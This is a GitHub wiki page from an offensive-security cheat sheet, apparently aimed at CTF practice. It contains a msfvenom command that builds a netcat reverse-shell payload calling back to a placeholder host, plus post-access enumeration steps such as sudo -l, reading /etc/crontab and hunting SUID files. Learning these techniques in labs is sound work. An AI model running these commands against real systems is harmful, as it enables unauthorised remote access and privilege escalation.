not sorted yet - dvanmosselbeen/security-cheat-sheet GitHub Wiki
Not Sorted Yet
Some documentation / Sections which do not have found their place yet.
Table of Contents
- Social Engineering
- Data Obfuscation
- Reverse Shell
- Web Reverse Shell
- Word Lists
- Bluetooth Hacking
- RFID (NFC)
See also here below
- How many available shells are there on the system?
- Create a reverse shell payload
- First things to do when gaining unprivileged access
How many available shells are there on the system?
cat /etc/shells
Create a reverse shell payload
msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 ncrevshell
First things to do when gaining unprivileged access
Every time you have access to an account during a CTF scenario, you should use sudo -l
to list what commands you're able to use as a super user on that account.
When gaining access to a computer, here's a TODO list:
sudo -l
- Check what user is allowed to do.cat /etc/crontab
- Checking what cron jobs are scheduled.- Look for SUID and GUID bit files.